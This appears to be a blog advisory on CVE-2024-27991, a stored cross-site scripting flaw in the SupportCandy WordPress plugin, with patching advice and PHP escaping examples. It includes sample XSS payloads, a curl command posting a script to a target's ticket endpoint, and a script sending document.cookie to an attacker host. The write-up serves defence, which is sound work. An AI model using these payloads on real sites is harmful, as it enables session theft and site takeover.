In early 2024, security researchers uncovered a critical vulnerability in the popular WordPress support ticket plugin SupportCandy. The flaw—tracked as CVE-2024-27991—affects all versions up to 3.2.3 and lets attackers inject malicious scripts into your website, compromising security for both admins and users. In this post, we’ll explain how this “Stored Cross-site Scripting” (Stored XSS) vulnerability works, walk through a real-world exploit, and give clear guidance for users.
What Is CVE-2024-27991?
CVE-2024-27991 is an Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting", or XSS) vulnerability in SupportCandy. When an attacker submits input that the plugin neither sanitizes on save nor escapes on output, the injected code is saved (stored) in the database, so whenever staff or users later view the malicious ticket or message, the code executes in their browser.
Affected:
Versions: All releases through 3.2.3 (as of March 2024)
References:
- NVD CVE-2024-27991
- WPScan Advisory
Once the script runs in a victim's browser, an attacker could, for example:
- Deface your website
- Redirect visitors to phishing/malware pages
- Install other backdoors or malware
If your site uses SupportCandy and you allow visitors or customers to create tickets, you’re at risk.
Vulnerable Input
SupportCandy allows users to submit new support tickets with a subject and message. These inputs are rendered in the backend and sometimes on front-end pages without proper escaping.
Suppose an attacker submits a new ticket with the following as the *Subject* or *Message*:

```html
<script>alert('XSS by attacker')</script>
```
The malicious <script> tag is saved into the database as the ticket message or subject.
- When a staff member views the ticket in the WordPress dashboard, the JavaScript runs in their browser.
- The attacker can do much more than just pop alerts – for instance, they can steal cookies with

```html
<script>
fetch('https://attacker.com/steal?c='+document.cookie)
</script>
```
Example Code Snippet: Submit Malicious Ticket via HTTP Request
Here’s a simple example using curl to submit an XSS payload as a “ticket” (assuming public ticket submission is enabled):
```bash
curl -X POST \
  -d "subject=<script>alert('XSS')</script>" \
  -d "message=Exploit test" \
  https://targetsite.com/support/ticket-submit/
```
*(Replace /support/ticket-submit/ with the real endpoint—this varies depending on SupportCandy settings)*
When staff view the new ticket, the alert pops up. In a real attack, a stealthier script could steal session data, act as the victim, or spread the exploit.
1. A staff member or administrator logs in to the WordPress dashboard.
2. They open the new ticket submitted by the attacker.
3. Their browser silently runs the script – the attacker gains admin access, plants more malware, or defaces the site.
If your site serves customers, the XSS could even be triggered on public ticket pages or email notifications if input is reflected there.
How To Fix (Mitigation)
- Update Immediately: SupportCandy developers released 3.2.4 and later with the issue patched. Update your plugin from the WordPress repository or your site’s dashboard.
- Sanitize Input: If you're customizing SupportCandy or writing your own templates, always escape user data at the point of output: esc_html() for plain text, or wp_kses_post() where a limited set of HTML formatting is allowed.
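To make the fix concrete, here is an added example (not SupportCandy's own code) showing the unsafe output pattern beside the escaped version, plus a matching input sanitizer. The function names, the shape of `$ticket`, and the `subject`/`message` request field names are assumptions; the WordPress escaping and sanitizing functions are real.

```php
<?php
/**
 * Added example, not SupportCandy's own code: the "escape on output" fix the
 * mitigation section describes, alongside the unsafe pattern it replaces.
 * Assumptions: a $ticket object with ->subject and ->message loaded from the
 * database, and request field names 'subject' / 'message' (hypothetical).
 */

// VULNERABLE: the stored subject and message are echoed verbatim, so a subject
// such as <script>alert('XSS')</script> runs in the viewing staff member's browser.
function example_render_ticket_unsafe( $ticket ) {
    echo '<h2>' . $ticket->subject . '</h2>';
    echo '<div class="ticket-body">' . $ticket->message . '</div>';
}

// HARDENED: escape at the point of output, choosing the function by context.
function example_render_ticket_safe( $ticket ) {
    // The subject is plain text: esc_html() turns < > & " ' into entities, so the
    // payload is displayed as text rather than parsed as a tag.
    echo '<h2>' . esc_html( $ticket->subject ) . '</h2>';

    // The message may legitimately carry formatting, so wp_kses_post() keeps the
    // tags WordPress allows in post content and strips <script>, on* event
    // handlers and javascript: URLs.
    echo '<div class="ticket-body">' . wp_kses_post( $ticket->message ) . '</div>';

    // Inside an HTML attribute the escaping rules differ: use esc_attr() there.
    echo '<span title="' . esc_attr( $ticket->subject ) . '">'
        . esc_html( $ticket->subject ) . '</span>';
}

// Defence in depth: sanitize on save as well, so a payload never reaches the
// database. Returns the cleaned values; the caller decides how to store them.
function example_sanitize_ticket_input( array $request ) {
    return array(
        // sanitize_text_field() strips tags and control characters from one-line input.
        'subject' => sanitize_text_field( wp_unslash( $request['subject'] ?? '' ) ),
        // wp_kses_post() leaves only the allowed HTML subset in the message body.
        'message' => wp_kses_post( wp_unslash( $request['message'] ?? '' ) ),
    );
}
```

Escaping on output is the control that actually closes the XSS, because stored data may have entered through other paths (imports, API, older plugin versions); input sanitization only reduces what reaches the database.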
Conclusion
CVE-2024-27991 is a dangerous XSS bug in SupportCandy that puts your staff and users at risk. Anyone using SupportCandy up to v3.2.3 should update immediately to stay safe.
Check your sites, patch your plugins, and always be careful with user-generated content—especially when it goes into the WordPress backend!
*Stay secure—and spread the word to any other SupportCandy site owners you know.*
References:
- CVE-2024-27991 at NIST NVD
- Official SupportCandy Plugin Page
- OWASP XSS Explanation
*This guide is original and written exclusively for this post.*
Timeline
Published on: 04/11/2024 01:25:07 UTC
Last modified on: 06/26/2024 16:04:53 UTC